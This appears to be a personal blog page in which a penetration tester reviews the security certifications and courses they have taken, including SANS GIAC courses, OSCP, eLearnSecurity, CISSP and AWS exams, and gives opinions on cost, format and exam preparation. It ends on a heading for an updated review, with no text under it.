Offensive Security Advanced Windows Exploitation

Tenable Certified Security Engineer (TCSE), Tenable

Attended: February 2016, TCSE Obtained: February 2016

I don’t believe this training/certification is still available. Instead, Tenable has established the Tenable University which is home to a number of online courses covering an assortment of topics related to Vulnerability Management as well as courses covering the use/engineering of their suite of tools (namely, Nessus, Tenable.io and Tenable.sc). What’s more, they even offer certifications you can quickly pick up and put on your resume, all for free! For anyone looking to break into the infosec field or get more into vulnerability management, penetration testing, or offensive security in general, I highly recommend getting into this alternate material. I personally got my start in the technical information security space via Vulnerability Management and attribute my success in large part to what I learned specializing in this area. Every organization is (or should be) doing some form ofVulnerability Management or network vulnerability scanning which means no matter where you go with these skills you will have relevant, applicable experience. I also believe that having a robust understanding of vulnerabilities is useful in just about any infosec sub-discipline. Compliance pros need to understand risk, and vulnerabilities represent a large swath of an organizations technical risk-surface. Penetration testers obviously need to understand vulnerabilities as they are typically taking advantage of them as part of their daily job! “Blue-teamers” (e.g. incident responders, forensics, threat hunters, network analysts, etc…) need to understand vulnerabilities since these are generally the soft spots in a network or on a system that the “bad guys” are targeting. Understanding how vulnerabilities manifest themselves, the consequence(s) of exploitation and how to mitigate them is critical for defensive security professionals as well.

Core Impact Certified Professional (CICP), Core Security

Attended: April 2016, CICP Obtained: April 2016

For a brief period of time I got to play around with the powerful (and expensive) Core Impact exploitation framework. During this time, I traveled to Core Security HQ to take the Core Impact training course, the CICP. Core Impact is a mature, and relatively intuitive tool. This makes user-training (in my opinion) mostly unnecessary. To be clear, this training is centered around using the tool, as opposed to actual technical network penetration or exploitation methodology. Save the trip, save the money, this training is not something I would recommend.

SEC560: Network Penetration Testing and Ethical Hacking (GPEN), SANS

Attended: April 2016, GPEN Obtained: April 2016

SANS’ intro to penetration testing course is SEC560. The course has evolved quite a bit since I took it in 2016 so I won’t speak in-depth to what is covered. For that sort of thing, just search online to find more in-depth reviews of the course material. With this said, taking a look at the most up-to-date syllabus you’ll find that this course is chock-full of valuable penetration testing knowledge covering a wide-array of critical pentesting concepts including network reconnaissance, writing reports, scoping engagements, Nmap, Nessus, PowerShell, Metasploit, Veil, Pivoting, Empire, John, Mimikatz, Hydra, Kerberos, Responder, Bloodhound, ZAP, SQLi and more! Despite the material being quite sound in its overall coverage and depth, I believe the format is not ideal for actually learning penetration testing. I say this because penetration testing, especially as someone new to it, is likely dominated by a lot of trial and error. What this means is that you need a lot of time to try something, see if it works, learn why it didn’t and then try again. In other words, having time to fail and in some cases fail a lot, is very valuable. The pace in which SANS courses are conducted is not conducive to this method of learning. The format for labs is a series of individual exercises whereby the student has (in my opinion) their hand held throughout, each step is explained to them in precise detail, the answer is provided in short-order and you are then quickly whisked away to the next part of the lecture. SANS does give you the option during these labs to “not skip ahead” and see the answer(s) but in reality you likely won’t have time to take this figure-it-out-yourself approach. Being spoon-fed information in this manner is an OK way to be introduced to a technique or tool but I feel that later, when you attempt to exercise this knowledge in a practical setting you will likely feel unprepared having not actually practiced what you had learned in any meaningful way.

As for the certification, I think it has some benefit on a resume as I have seen plenty of job reqs asking for it. BUT! If you are taking this course you are probably interested in getting a job as an actual penetration tester and as such, I would argue that a lot of companies actually hiring penetration testers are looking for proof the candidate actually has some real, practical, more-robust, hands-on experience which you really just can’t get with this training in it’s current form. For these reasons, I wouldn’t recommend this course. With this said, SANS is slowly moving their certification exams to a slightly more practical format. I think this will help with the way those in the field perceive these certifications, especially compared to their more “practical” brethren such as the OSCP.

Certified Information System Security Professional (CISSP), ISC2

CISSP Obtained: March 2016

Love it or hate it, the CISSP remains one of the industries most recognized and sought after certifications. Those who hold the cert tend to command high salaries and from what I’ve seen, it seems to just make you more hirable in general. No, it’s not a practical cert and yes, taking the exam is kind of grueling but if you meet the pre-requisite qualifications, I definitely recommend going for it. I recommend picking up a CISSP study-book on Amazon (back when I took it I used whatever the latest Shon Harris all-in-one guide was available) rather than signing up for some expensive boot camp.

The exam has undergone some drastic changes since I sat for it in 2016, now being only 3 hours (versus 6) and only have between 100-150 questions (which is far less than previous versions). This shortened format will definitely help those who would normally experience fatigue taking such a long exam. This being said, I will warn you that with less questions comes more weight with each question, so you must exercise a little more care with each question as any incorrect answer will count against you more. When I took the exam i found many questions to be worded poorly (as if not written by a native English speaker) and I often found scenario-based questions to be highly subjective, often looking for the “best” of several seemingly-equally-correct answers. This is one reason I recommend finding an “official” study-guide and reading through it as part of your overall studying regimen, remembering to take any available practice tests that are contained in the book. I found, by reading through these guides, that there was a certain “CISSP” way of answering questions. This way of thinking, when applied to these scenario-based questions will more-often yield the correct answer then if you were to approach it from what I would consider a non-biased point of view. For example, there might be a question that asks you something like “As a security manager for a large banking organization, what is your highest priority?”. It will then list a number of possible answers, each of which seems potentially viable but one of the answers will be something about the “physical safety of the employees”. Of course the CISSP training wants to drill into your head that human safety is priority number one! Even if that seems somewhat irrelevant to an exam about Cybersecurity.

Given the high demand for CISSP-certified professionals, especially in certain job markets, it’s no surprise there are a lot of people, especially those more junior in the field, asking about and looking to take this exam. ISC2 requires those who sit for the exam to have a minimum of 5 years of (relevant) experience (or optionally 4 years plus a relevant degree) and I think this makes sense. It certainly made my test-taking experience much smoother having this experience to lean on than if i had tried to power-study for it early in my career, having not truly understood and practiced the concepts in a real-world setting. Adding to this, I think I greatly benefited in having an extended background in the “softer” side of security (policy & compliance) early in my career coupled with a recent history in the more technical aspects of infosec. As a certification that attempts to cover basically “all of security”, it shouldn’t come as a surprise that having a well-rounded experience would lend itself to being more successful with the exam. To wrap this up, let me just summarize again by saying that I think experience, more so than just remembering facts is particularly useful with this certification (I say this relative to other certification exams where I do think you can be successful just cramming facts into your head) given the nature of the scenario-based questions that are asked.

Penetration Testing Student (eJPT), eLearnSecurity

eJPT Obtained: December 2016

The PTS from eLearnSecurity is a relatively limited in scope, yet high-value course. With hours of video lectures, practical VPN-based labs and a self-paced style, I found it a really good format for learning this sort of technical material. What’s even better is this course can often be taken for FREE, as eLearnSecurity has frequently given out vouchers for the course as part of different promotions or for something as simple as attending a free webinar (note that the exam attempt is not typically included with this free voucher). Where you can pick up a free voucher, I definitely recommend going through the material, especially as a beginner. Otherwise, this course clocks in at about $400 and in this case I just don’t really recommend it. Again, I think the material is great, but I think your money is better spent on a more comprehensive course like eLearnSecurity’s PTP course or the OSCP. In the end, having “Penetration Testing Student” training or a certification titled “Junior Penetration Tester” from the lesser known eLearnSecurity on your resume is not likely to turn a lot of hiring manager/recruiter heads. You’ll also get a far better curriculum by just spending your money on the more serious courses.

Penetration Testing Professional (eCPPT), eLearnSecurity

eCPPT Obtained: February 2017

The PTP is a fantastic offering from the not-so-well-known online training provider eLearnSecurity. This course can be thought of as eLearn’s direct competitor to the much more well-known OSCP certification from Offensive Security. The PTP course covers a lot of technical ground including assemblers/debuggers, shellcoding, network pentesting, PowerShell, Linux exploitation, web apps, WiFi hacking and even has an in-depth ruby for pentesters module. The course material certainly shines in certain spots relative to the OSCP - modules on PowerShell, WiFI security and Ruby are not be found in the PWK curriculum (last I checked). The decision to take the PTP course is likely not made without asking, why should I take this over the PWK/OSCP? I’ll attempt to make the case for both of these courses, providing my thoughts on each, below.

One of the biggest differences between the PTP and the OSCP in my opinion is the expectations of the student. OSCP is (in)famous for forcing its “Try Harder” mentality whereas the PTP takes a different approach. With the PTP, and similarly with other courses offered by eLearn, students are provided focused labs where the student can practice specific skills and techniques, taking a lot of the guesswork and trial-n-error out of the equation. I do think that this approach is a little “hand-holdy” which I believe can be detrimental to full absorption of the concepts. I found that I failed less in achieving the desired outcome within these labs and as a result learned less about the ways things didn’t work. Though ultimately far more frustrating, there is a method-to-the-madness with the OSCP approach. Where you are forced to figure it out yourself, I believe you really will learn the material in a much more robust way. You’ll also, as a consequence of having to “try harder”, frequently end up down rabbit holes where you learn all sorts of stuff that doesn’t end up being applicable to your ultimate solution, but its gained knowledge all the same. All this said, I think the eLearn approach might be better suited to my personal learning style. The PTP lab environment, which is essentially a series of individual exercises, each with specific lab systems for that exercise, is a less realistic method of practicing penetration testing techniques as compared to the PWK/OSCP. The PWK/OSCP sports a large, open, multi-layered, “wild-west”-style lab network, comprised of many different interconnected systems. Having a large heterogenous network such as this is more realistic in terms of simulating an actual network. Where I think the PTP gains back ground on the OSCP is that the exercises/content/exam is (in my opinion) far more modern. Specifically, you do a lot of hackery in a Windows Active Directory environment with the PTP which I found lacking in the OSCP. Finally, I think the PTP exam unlike the OSCP exam, is a better representation of a realistic (albeit mini-) network in which you need to compromise. This is a little funny considering the OSCP had the far more realistic lab setting but when it comes to the exam they seem to regress. The OSCP is essentially just a series of 5 CTF boxes whereas the PTP requires breaching a machine in a “DMZ”, then pivoting into other internal networks and performing subsequent exploitation.

So here’s where I stand on PTP vs OSCP: It’s difficult to recommend one over the other as they both have certain strengths and weaknesses. I recommend the PTP for its sheer breadth of awesome material, which is brought more directly to you rather than having to find it yourself. I also think the PTP exam better exercises your ability to do real penetration testing given you actually have to do pivoting (among other things not experienced during the OSCP exam). Another example of how I think the PTP exam excels over the OSCP is the duration and reporting aspect of these exams. It’s not terribly realistic that you would be asked to do a penetration test in 24 hours followed by delivering a full report after an additional 24 hours (which is what is asked of you in the OSCP). In my experience, you will have more time to perform the engagement and provide the deliverables. As such, the PTP exam is a week long, with an additional week to provide the report. I do think the PTP is a great complement to the OSCP though, rather than a “choose one or the other”. However if you can only choose one, I would still ultimately give the edge to the OSCP. The huge lab environment is both challenging and exhilarating - an amazing playground for an offensive student. Though I think the material is a bit outdated, I think the most important thing taught by the OSCP is the mentality and methodology. You learn, by trying harder (and enumerating a lot), a more realistic way to breach systems and networks. The experience of failure and the determination you must bring to the OSCP fight can’t be understated and it is absolutely a skill you’ll need for real-life penetration testing. Also, and this is probably the most important point, the OSCP is (currently) the far more recognized and sought after certification by hiring managers and recruiters. That alone is reason enough to choose the OSCP over the PTP.

SEC503: Intrusion Detection In-Depth (GCIA), SANS

Attended: March 2017, GCIA Obtained: July 2017

Generally speaking, I probably wouldn’t recommend most 500-level SANS courses. They’re expensive and I personally believe you can find most if not all of what is covered in the course searching online. With that said, I think SEC503 could be the exception to that rule. Yes, I still think you can find a good bit of this material online, but I think in this case it would be far more difficult to self-administer it. This course, an undeniably “blue” / defensive security course, which preps you for the GCIA exam is by far my favorite SANS course that I have taken - and this is coming from someone who is an offensive security specialist by trade! I credit my infatuation with the course to the following three points.

At the time I took this training, TCP/IP and general networking concepts were weaker knowledge areas for me, so I really just learned SO MUCH during this course. Much of my early technical focus was on web applications or using certain tools for network penetration testing. I glossed over in those early times, the importance of understanding what is happening at layers 2-4. This course cleared that up for me and then some. This course has two distinct sections (spread out over the course of 5 days of lecture) - traffic analysis and then tooling. As someone more on the “offensive” side, my need to (or desire to) understand a lot of the defensive tooling was certainly minimized back then. Where I found the extreme value, was days one and two where you go deep (and I mean DEEP!) into traffic analysis, packet dissection, understanding of protocols, etc… It is an undeniably dense and information-packed two days but I think one of the best two days of learning I have ever experienced. As for the final 3 days, though I didn’t appreciate it as much then, I now have a much greater appreciation for what was covered. This is a great example of how I discounted certain things early in my career because I didn’t think it was relevant to where I wanted to go professionally. Years later I can see that even as an “offensive specialist” understanding exactly how defender tools (e.g. Snort, Bro/Zeek, SIEMs, SiLK, NetFlow, etc…) work is extremely important. Whether this be because you are trying to bypass these tools or you are looking to set them up in a home/test lab so you can practice against them - it’s good to know how they work. What’s more, I have found that slotting in, in a perfect, exclusively “offensive” role, where all I do is pentest or red team is easier said than done. More likely, at least in my experience, is you’ll need to have experience (especially in an engineering capacity) with tools across the security space, from red to blue.
The material for this training is fantastic and I think a little more challenging to find for yourself online then perhaps other courses. Sure you could buy yourself a book on TCP/IP, this of course would be a perfectly acceptable approach to learning some of this material! But, I think the the course content has been perfectly cropped here for both offensive and defensive security professionals alike to get a firm understanding of how to interpret network traffic and leverage a number of well-known industry tools.
My instructor for the course was Jonathan Ham. He did such an outstanding job making something as seemingly dry as in-depth packet analysis so interesting.

I still think spending $7000+ is not worth it for any individual paying out-of-pocket but if you do get a chance to take a SANS cert through work, desperately want to pay for a SANS cert yourself or maybe you get accepted to a SANS workstudy, I would highly recommend taking a look at this one.

SEC573: Automating Information Security with Python (GPYC), SANS

Attended: May 2017, GPYC Obtained: August 2017

Do not spend money on this course. Don’t even let your company spend money on this course. This course isn’t meant to be an “introduction to python”, yet they spend two straight days painstakingly explaining the basics. For anyone who has even mild experience with Python, this is excruciating. After the first two days, the material definitely gets more interesting, but nothing is covered in these final modules that isn’t equally covered in any number of very cheap books. The book Violent Python is actually handed out in the class (as part of your $7k+ tuition) and has plenty of what is covered in those final three days of lecture. Do yourself a favor and just Google “learn python” and follow a few of the online tutorials. This should satisfy the basics requirement (what is covered in days 1 and 2). From there, buy a “python hacking” book or two (e.g. The Violent Python book, Black Hat Python, Gray Hat Python, etc…) to learn how to use cool security-related modules (e.g. requests, scapy, struct, sockets, etc…). Here is an assortment of other books that you can use to teach yourself Python. Just please, don’t spend money on this course.

SEC575: Mobile Device Security and Ethical Hacking (GMOB), SANS

Attended: October 2017, GMOB Obtained: December 2017

I don’t recommend recommend taking this course. The material is interesting enough but it suffers from the pace in which the mobile world moves. Given the speed in which features are added to the iOS and Android platforms it is difficult to maintain a cutting-edge mobile device hacking course - and it shows. What’s more, its difficult to really demonstrate iOS security concepts given how locked down the platform is and how uncertain it is whether there will be an active Jailbreak (which can be used to install iOS-related security tools and demonstrate other security things). For this reason, this course centers mostly around the Android platform. To this course’s credit though, I did find it pretty cool how much more approachable mobile device hacking/security was than I had imagined. I think this course is one of SANS’ more neglected offerings in terms of how frequently it is updated and that’s too bad considering how mobile devices have become more a part of everyone’s daily computing lives.

Offensive Security Certified Professional (OSCP)

OSCP Obtained: July 2018

I provide some details on the OSCP in my review of eLearnSecurity’s PTP course, but I will expand on the (PWK) course more here. First, let me say that I highly recommend this course for all security professionals. I think this is an obvious choice for those looking to get into penetration testing and I would even recommend those in “defensive” security positions take a look at this course. After all, what better way to understand how to defend then understanding how your systems may be attacked!

Ok, so you don’t really need me to tell you that the OSCP is a great certification and the PWK is an excellent course, nor do you really need yet another full OSCP review. After all, there are TONS of reviews already out there. Instead, let me list a few thoughts and pieces of advice I have related to the OSCP.

The exam (mostly) forbids the use of exploit frameworks such as Metasploit or vulnerability scanners such as Nessus. Many OSCP students take this as a cue to try and get through the entire lab without the use of these sorts of tools. I don’t recommend this. Not because Metasploit or Nessus or similar tools are so useful that they will give you a serious leg up but rather these tools are good to know how to use in general! Why not take the time to learn how to use them? The lab is a fantastic place to try your hand with all sorts of tools and techniques so you should really take full advantage. To compensate however, where you did leverage a tool like Metasploit or Nessus, figure out how you would have exploited a system, or enumerated a system in the absence of these tools. In this way, you’ll still feel fully comfortable come exam time. Don’t NOT use them just because the exam dictates you can’t.
As a clarification, the OSCP (at least when I took it) allowed the use of ONE metasploit module (so fire wisely). It also allows you to use the Metasploit session management features (i.e. multi-handler), with no limits.
The PWK lab has a LOT of vulnerable systems, it’s important that you manage and maintain records of what you’ve found on each of these systems including open ports, credentials and other important artifacts. There are any number of tools/methodologies that can assist in this endeavor but I recommend you take a look at the MSFDB functionality offered natively by Metasploit. This can help you keep track of things.
Take screenshots! Lots of screenshots! You’ll need this for the lab report, you’ll need it for the exam report, you’ll need it for future professional penetration test reports. Screenshots are good, get used to taking them.
I recommend going through BOTH the PWK PDF and the videos before seriously getting into the lab itself. This is what I did and I found it more comforting to know what Offsec wanted me to know vs what I needed to hunt for myself (as part of their ever-so-fun game of “try harder”).
The exam does not require any pivoting. You should absolutely practice this in the lab but won’t need it come test time.
Don’t worry about pwning every box in the lab. Getting through X amount of boxes isn’t a sign that you are ready. I got through about 30 which was more than enough!
I think the OSCP is mostly a positive experience but I do think that it is very “CTF”-ey. Which is to say, less like hacking a real modern network and more like doing a series of hack-the-box challenges. Make the most of it though! It can be really fun if you’re in the mindset of learning rather than just “getting the cert”.

SEC504: Hacker Tools, Techniques, Exploits and Incident Handling (GCIH), SANS

GCIH Obtained: December 2018

SEC504 is SANS most popular course. It is designed to be approachable for both semi-experienced professionals as well as to those new to the field and covers both offensive and defensive security domains. I did not actually take the course but I did challenge the GCIH exam which accompanies the course. Personally (and again, I did not actually take the course), I would not recommend this course as I think it tries to cover too much ground in too short of time. The course attempts to cover network attacks, incident handling, memory analysis, malware investigations, offensive tooling, network analysis, physical security, network scanning AND web application attacks… all in 6 days. You get a brief intro to each of these topics (the course does have a day with a heavy focus in Incident Handling) but I don’t think it covers any of them at the depth you would want given you payed $7000+ to take the course. Of course given its popularity, if getting this cert helps you land a specific entry-level position, then absolutely go for it!

SEC401: Security Essentials (GSEC), SANS

GSEC Obtained: February 2019

SEC401 is SANS’ “mile wide and an inch deep” course. I like to compare its accompanying cert, the GSEC, to the popular ISC2 CISSP certification (which I also have some thoughts on). I did not actually take this course but I did challenge the GSEC exam. Given the price, I don’t think I can really recommend this course. If you’re interested in getting a lay-of-the-(infosec)-land, I recommend looking into some free “intro to security” courses online or even looking at study books for the Security+ or CISSP. Either of these should get you acquainted enough with the foundational concepts of information security. Both of these (CISSP and Sec+) are also great (cheaper) options for a certification well-respected in the industry. The GSEC certification I don’t think is going to move the needle on impressing any recruiters (no more than the Sec+ or CISSP that is) and the course material is probably easy enough to find online or via some cheap text books.

SEC542: Web App Penetration Testing and Ethical Hacking (GWAPT), SANS

GWAPT Obtained: March 2019

This course is an introduction to web-application-specific penetration testing. I did not take the course but I did challenge the accompanying GWAPT certification exam. Similar to my GPEN review, I don’t recommend this course as it doesn’t provide a format conducive to really learning penetration testing. For learning penetration testing, I would recommend a more practical approach. Not that SANS doesn’t have practical exercises and in-training labs, it’s just that these labs fly by so quickly during the course of the training that you really don’t have time to fail, and failing is a great way to learn. Instead I would recommend a more practical course such as the eLearnSecurity WAPT course. With the current popularity of “bug bounty hunting” and penetration testing in general, there is certainly an abundance of free or cheap web-application hacking training material out there. The Web Security Academy from the famed PortSwigger (creator of Burp Suite) is just one example of this. More examples of free/cheap online training material for web application penetration testing can be found in my guide to free/online training!

FOR610: Reverse-Engineering Malware (GREM), SANS

Attended: May 2019, GREM Obtained: July 2019

I think this course is fantastic! I took this course prior to it’s adoption of Ghidra so I can’t speak for the new content but the instructors do a fantastic job getting through some of the trickier concepts (even for those new to the world of reverse-engineering). Unlike other SANS courses, especially penetration testing courses, I felt by the end of this training I could actually do real-world, practical, malware reverse-engineering. I should mention that prior to taking the course, I did have some background in assembly language and reverse-engineering but I still feel that anyone who dutifully gets through all of the material in this class could similarly feel ready to do some real malware reversing. For anyone interested in getting into malware reverse-engineering, I definitely recommend checking this course out. Paying full price for this class however is where I would be a little hesitant to recommend as I do think there are cheaper options out there.

I want to reemphasize here that you’re probably best set up to succeed having a little knowledge about assembly (specifically Intel assembly) prior to sitting for this course. This isn’t explicitly listed on the “Prerequisites” section for the course by SANS but having taken this class with a coworker who did not have much experience in this area, watching some of their struggles really emphasized this point. Check out my primer on intel assembly or dive right into Intel’s own manuals if you are interested in getting prepped!

ICS515: ICS Active Defense and Incident Response (GRID), SANS

Attended: July 2019, GRID Obtained: November 2019

SANS ICS515 is a bit of a niche course, covering incident response techniques as well as knowledge and tooling specific to OT environments. First, I’ll say I probably wouldn’t recommend spending (your own) money on this course. At the point in which I took this course I had already taken 10+ SANS courses and as such, found that this course had a lot of similarities, things seemingly plucked from each of these other courses and made available in this course, albeit with a distinct ICS-flavor. There is a section on asset discovery and network security monitoring (NSM), reminiscent of both the SANS SEC460 and SANS SEC503 courses. There is a section on Incident Response, which echoes material taught in SANS SEC504. There is a section titled “Threat and Environment Manipulation” which focuses on ICS malware case-studies as well as malware analysis. This section contains plenty of material from SANS FOR610. The newest content to me (having not taken a course related to it) was covered in day one of the course, focusing specifically on “Threat Intelligence”. Though SANS also has a course dedicated to threat intelligence, I found this introduction to threat intel, as applied to ICS environments a good primer on the subject, covering the (ICS) Cyber Kill Chain, Active Defense, Intelligence Life-Cycle, Diamond Model and more. Overall, my biggest takeaways from this course were from this first day but having a unique interest in ICS security, I found the entire course pretty fascinating, despite a lot of the material being a rehash of similar content from other courses.

SEC660: Advanced Penetration Testing, Exploit Writing and Ethical Hacking (GXPN), SANS

Attended: November 2019, GXPN Obtained: August 2020

SEC660 is SANS advanced penetration testing and intro to exploit writing course. I will echo what I have said about other SANS penetration testing courses and say that I don’t think that the format of this course is ideal for teaching penetration testing. Rapidly going lab-to-lab and lecture-to-lecture, with little time to actually practice the offensive techniques is not a great way to really learn and practice penetration testing. With that said, I do think the topics covered are really good with respect to the more advanced types of network pentesting. Where this class shines in particular is the final two days where you break into exploit writing for both Linux and Windows. Though I think the exercises are a little limited, I do think they are a great introduction to the world of exploit development for these respective platforms. I think for those interested in getting into exploit development, this is a decent place to start (though it is, as usual with SANS, an expensive option). With this said, I think “advanced network penetration testing” and “exploit development” are really two different disciplines and SANS may have been better served to separate them into two distinct courses. I think a lot of professional penetration testers don’t need to have exploit writing skills and vice versa. In the overwhelming majority of penetration testing engagements, you likely don’t have time to write your own exploits or find zero-days. Conversely though, understanding already-written exploits and thus being able to modify exploit code on the fly is a great skill for your average penetration tester.

As part of this “mini-review”, I wanted to share some thoughts on the “practical” portions of the GXPN exam. Prior to taking on this course, and during the prep-time for the certification, the (partial) practical nature of this certification was something that was always on my mind. It certainly changed the way I prepared for the exam since I knew I’d need to actually put my knowledge to actual use, rather than simply regurgitate/recall random facts/concepts as is the case with most other GIAC exams. This exam, unlike most GIAC exams (though they are moving more exams to this partially-practical format) has a small number of questions (6 in my case) which require actually remoting into a lab environment and doing some sort of actual “hacking” relevant to the course material. Knowing this, I spent much more time than I had with previous certifications (the advanced nature of the material also was a factor for time-spent studying) prepping for the exam. I expected these questions to be difficult and to be centered primarily around the exploit development/reverse-engineering (the more challenging) aspects of the course. What I found was that neither of these things ended up being true (at least in my opinion/experience). The questions were straight-forward (which is not always the case with the multiple-choice, scenario based questions you often find on GIAC exams), relatively easy and did not take that long to complete. I also was surprised to see that the majority of the questions (atleast on my instance of the exam) were not actually related to days 5 and 6 (which cover exploit writing). It’s also important to note that for those questions that were covering days 5 and 6 material, none of them were particularly in-depth. Given the time-constrained nature of the exam, the exam authors can’t expect people to be putting together full ROP chains now can they!? In short, study the material, try to really grasp the concepts for the sake of grasping the concepts - but don’t sweat the practical exam questions, they aren’t that bad!

SEC617: Wireless Penetration Testing and Ethical Hacking (GAWN), SANS

GAWN Obtained: November 2020

SANS’ advanced wireless penetration testing course offers an amazingly practical introduction to an array of RF technologies and how you can exploit them. This training covers traditional WiFi, DECT, ZigBee, a couple Bluetooth variants, RFID, NFC and even Software Defined Radio (at a high level). Included with the expectedly high entry fee is a box - yes, an entire BOX! - of cool hacking gadgets to use throughout the various hands on labs - bluetooth dongles, SDR, a Raspberry Pi, RFID badge cloner and more…

Unfortunately for me, I took this class in 2020 - best known for being an amazingly crappy year on a global level and more specifically, infamous for the global Covid-19 pandemic. For me, this meant taking the class via SANS On-Demand. Up until then, I had never taken an on-demand course from SANS, opting instead for in-person trainings for each of the courses I had taken prior. In a vacuum, I found the on-demand format to be pretty good. The physical books are mailed to you as well as available via your SANS portal as a digital .PDF and the video lectures are pre-recorded, typically by the course author themselves as well as downloadable so you can watch them anywhere. Where the on-demand format falls short, especially for this course is with labs. In typical a classroom setting, the instructor will have set up a physical lab environment in which the students can practice their hacking skills. With a class which requires an active medium (actual ZigBee buzzing around for example) in which to hack, which is not easily delivered in virtual form, the practical components of the course proved far more difficult to exercise. Ultimately, I do recommend this course for anyone looking to learn more about wireless hacking but I would advise that those interested hold off on taking the course until they are able to do so in a physical classroom setting.

AWS Certified Solutions Architect Associate

Obtained: November 2020

With the help of the online training platform A Cloud Guru, I sat for and passed the AWS Certified Solutions Architect Associate exam. I give a lot of credit to this training platform for my success and would recommend others interested in taking this exam take a look at signing up. It’s not an overwhelmingly cheap service but it is far more economical than a lot of other training platforms (*cough* SANS *cough*) and the RoI on getting an AWS cert seems to be pretty high these days. The virtual video lectures provide both theoretical instruction as well as hands-on, practical labs that you can follow along with. The instructor, Ryan Kroonenburg, does a great job at walking you through the labs and alerting you if something you spin up in your AWS account would result in you seeing actual charges. The Solutions Architect curriculum is essentially just a high level speed-run of a large number of core AWS services (IAM, S3, EC2, RDS, VPC, ELB, SNS, SQS, Kinesis and Lambda to name a few of the big ones.) You’re expected to know what each of these are at a relatively good technical depth, how they interact and when you would use each of them. The exam questions are mostly scenario-based and at times can be confusing and subjective though typically you can figure out the best answer by slowly using the process of elimination to rule out certain answers that can’t be true due to some small detail contained within the question prompt or the answer itself. I also recommend those who are prepping for the exam to buy some practice exams from a site like Udemy as I found these very useful in just getting a feel for what the actual exam questions would be like. At 65 questions and a passing score of 720 (out of 1000), the exam doesn’t leave too much room for error so be sure to really think through each of the scenario-based questions. Given the popularity of “Cloud” in modern enterprises, taking training and picking up this certification seemed like a very good idea.

AWS Certified Security Specialty

Obtained: December 2020

Shortly after picking up the solutions architect associate, I spun up the A Cloud Guru video lecture series for the AWS Certified Security Specialty and began prepping for the security specialty exam. Given this exam was more specific to “security” within AWS, and given my extensive security background, I expected this exam to actually be easier than the solutions architect. This assumption proved mostly false. Yes, the exam does cover less topics and services than the solutions architect exam but the understanding you must have requires quite a bit more technical depth. With this said, I do think my years of security experience came in handy with a few questions. The A Cloud Guru course covers the security aspects of S3, Identity Federation, CloudFront, CloudWatch, CloudTrail, Config, Inspector, Trusted Advisor, VPC, NAT, ELB, WAF, Shield, API Gateway, Athena, Macie, SES, Artifact and Lambda (and maybe a few more) - with a heavy, and I mean HEAVY focus on both IAM and KMS. I found that well over half of the questions on the security specialty exam asked very challenging, scenario-based questions related to IAM and KMS. Overall, I thought the course from A Cloud Guru was great and I certainly learned a lot. However, having now taken (and luckily PASSED) the exam, I can say that this course does not really cover all the topics needed to comfortably pass the exam. In some cases, more depth seemed to be required, and in other cases, there was simply something not covered at all. I don’t fault A Cloud Guru though as AWS is notorious for adding more and more services and functionality to their platform all the time and the specialty exam DOES recommend that those who sit for the exam have 2 years+ experience securing workloads in AWS. So don’t expect this course to be your one-stop-shop for easily passing this exam. Listed below are some of the gaps I think the course had with respect to the exam questions I encountered as well as some other general tips for what to put emphasis on when studying.

Really understand how to read IAM policies. I found many questions asking me about very specific policy statement syntax. This was doubly true for conditional statements within these policies.
Though this is covered pretty well by the A Cloud Guru course, it deserves special mention here. REALLY understand how to share S3 buckets cross-account. You WILL get several questions asking about this.
There are a few in-depth questions on web identity federation not really covered well enough in the course.
Truly understand the differences between Inspector, Trusted Advisor and Config. You will be asked which of these is the right service for a specific objective and I found these questions somewhat challenging. I also thought Config had a particularly heavy focus.
Understand the relationship between CloudTrail and CloudWatch Logs.
There were some very specific questions on CloudHSM I felt weren’t covered well by the course. Try to read some AWS documentation on CloudHSM.
KMS, KMS, KMS, KMS. So much KMS. You will be asked like 30 questions on KMS. Really understand key rotation, how to provision access to keys, key policies, administering keys and everything else to do with KMS. Read the FAQ, read the whitepapers, read everything you can on KMS, understand cross-account KMS access and KMS Grants.
I had a question on taking memory dumps from an EC2 instance. I think SSM covers this. The course doesn’t get into this I don’t think.
The course covers this well, but there are a good number of questions related to Security Groups, NACLs and Route Tables. Understand the in’s and out’s (get it?) of these controls.
Understand Function Policies vs Execution Roles for Lambda.
Understand the AD Federation sequence.
Read up on using certificates with CloudFront.

With all this said, I really enjoyed the course from A Cloud Guru and though I found the exam challenging, I think the questions were relevant and a good exercise of my AWS security knowledge. Remember to take your time with scenario-based questions and really try to rule out questions based on why they CAN’T be the answer. Good luck!

SEC588: Cloud Penetration Testing (GCPN), SANS

GCPN Obtained: April 2021 | Attended: August 2022

Update: This review contains my original impressions of the course, I also have an updated review below.

SANS continues to expand their portfolio of courses, and within these new offerings is SEC588: Cloud Penetration Testing. “Cloud penetration testing” is at a… weird point in my opinion and I think this is evident in the makeup of this course. SANS does their best to differentiate how “cloud” pentesting is different than traditional network/webapp pentesting but really, there isn’t that much difference and even they admit this within the course material. Sure, the course authors key in on certain things that are more effective in cloud environments for performing reconnaissance and enumeration (among a few other things), but for the most part, nothing really changes here as it compares to traditional network/webapp testing. At the end of the day, you’re still using Nmap for port scanning, Metasploit for payloads, etc…

Cloud native applications as defined by the CNCF (and as introduced by SANS) heavily leverage containers, CI/CD tooling, container orchestration (i.e. Kubernetes) and APIs/microservices. This course spends a good deal of time covering the security and pentesting aspects of these technologies. This is all great stuff but I think a full course on container pentesting - or webapp pentesting which focuses on APIs/microservices might be better than covering all these topics so briefly. The course also seems to heavily favor AWS instead of equally featuring other cloud providers. There is actually one day where Azure is covered but this really feels like only an introduction. Oh and there’s no mention of GCP that I can remember at all. By the time you get to Day 5 (Exploitation and Red Team in the Cloud) the course authors really start to run out of ideas as they pivot (literally) from attacking the cloud to using the cloud itself to stage attacks from (i.e. proxycannon, cloud-based C2, tcp redirectors, etc…) Though this is really cool stuff for sure, I think it makes more sense for a course on red-teaming (still waiting on the 6-day redteaming course from SANS!) than it does a cloud pentesting course.

Overall, I feel this course introduces a lot of interesting topics but doesn’t cover any at a technical depth that I think they could have in 5 days had they taken out some of the unnecessary things and focused a little more on core material. In the end, I did enjoy the course and was able to achieve the GCPN certification but I don’t think I would recommend this course to others at this time. Instead, I would suggest those who are interested in learning more about cloud penetration testing take a look at some books on the subject (for example, AWS Penetration Testing), blog posts or other offensive cloud research that is only a quick google search away.

Updated GCPN Review (8/27/2022)

